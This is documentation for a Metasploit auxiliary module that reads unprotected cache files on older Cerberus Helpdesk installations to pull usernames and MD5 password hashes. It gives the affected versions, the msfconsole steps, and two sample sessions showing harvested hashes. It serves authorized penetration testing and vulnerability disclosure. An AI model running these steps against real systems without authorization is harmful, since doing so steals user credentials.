ContextQMD
Back to Metasploit Framework

Cerberus Helpdesk Hash Disclosure

documentation/modules/auxiliary/gather/cerberus_helpdesk_hash_disclosure.md

6.4.1313.0 KB
Original Source

Description

This module opens a devblocks_cache---ch_workers or zend_cache---ch_workers file which contains a data structure with username and password hash (MD5) credentials. The contents looks similar to JSON, however it is not.

Vulnerable Application

This module has been verified against the following Cerberus Helpdesk versions:

  1. Version 4.2.3 Stable (Build 925)
  2. Version 5.4.4

However it may also work up to, but not including, version 6.7

Version 5.4.4 is available on exploit-db.com

  • of note, 5.4.4 has to be installed on a PRE php7 environment.

Verification Steps

  1. Start msfconsole
  2. use auxiliary/gather/cerberus_helpdesk_hash_disclosure
  3. set rhosts [rhosts]
  4. run

Scenarios

4.2.3 using zend (not verbose)

  msf > use auxiliary/gather/cerberus_helpdesk_hash_disclosure
  msf auxiliary(cerberus_helpdesk_hash_disclosure) > set rhosts 1.1.1.1
  rhosts => 1.1.1.1
  msf auxiliary(cerberus_helpdesk_hash_disclosure) > run
  
  [-] Invalid response received for 1.1.1.1    for /storage/tmp/devblocks_cache---ch_workers
  [+] Found: admin:aaa34a6111abf0bd1b1c4d7cd7ebb37b
  [+] Found: example:112302c209fe8d73f502c132a3da2b1c
  [+] Found: foobar:0d108d09e5bbe40aade3de5c81e9e9c7
  
  Cerberus Helpdesk User Credentials
  ==================================
  
   Username                     Password Hash
   --------                     -------------
   admin                        aaa34a6111abf0bd1b1c4d7cd7ebb37b
   example                      112302c209fe8d73f502c132a3da2b1c
   foobar                       0d108d09e5bbe40aade3de5c81e9e9c7
  
  [*] Scanned 1 of 1 hosts (100% complete)
  [*] Auxiliary module execution completed

5.4.4 using devblocks

  msf > use auxiliary/gather/cerberus_helpdesk_hash_disclosure 
  msf auxiliary(cerberus_helpdesk_hash_disclosure) > set rhosts 192.168.2.45
  rhosts => 192.168.2.45
  msf auxiliary(cerberus_helpdesk_hash_disclosure) > set targeturi /cerb5/
  targeturi => /cerb5/
  msf auxiliary(cerberus_helpdesk_hash_disclosure) > set verbose true
  verbose => true
  msf auxiliary(cerberus_helpdesk_hash_disclosure) > run
  
  [*] Attempting to load data from /cerb5/storage/tmp/devblocks_cache---ch_workers
  [+] Found: [email protected]:37b51d194a7513e45b56f6524f2d51f2
  [+] Found: [email protected]:acbd18db4cc2f85cedef654fccc4a4d8
  [+] Found: [email protected]:18126e7bd3f84b3f3e4df094def5b7de
  
  Cerberus Helpdesk User Credentials
  ==================================
  
   Username                     Password Hash
   --------                     -------------
   [email protected]                 37b51d194a7513e45b56f6524f2d51f2
   [email protected]                 acbd18db4cc2f85cedef654fccc4a4d8
   [email protected]            18126e7bd3f84b3f3e4df094def5b7de
  
  [*] Scanned 1 of 1 hosts (100% complete)
  [*] Auxiliary module execution completed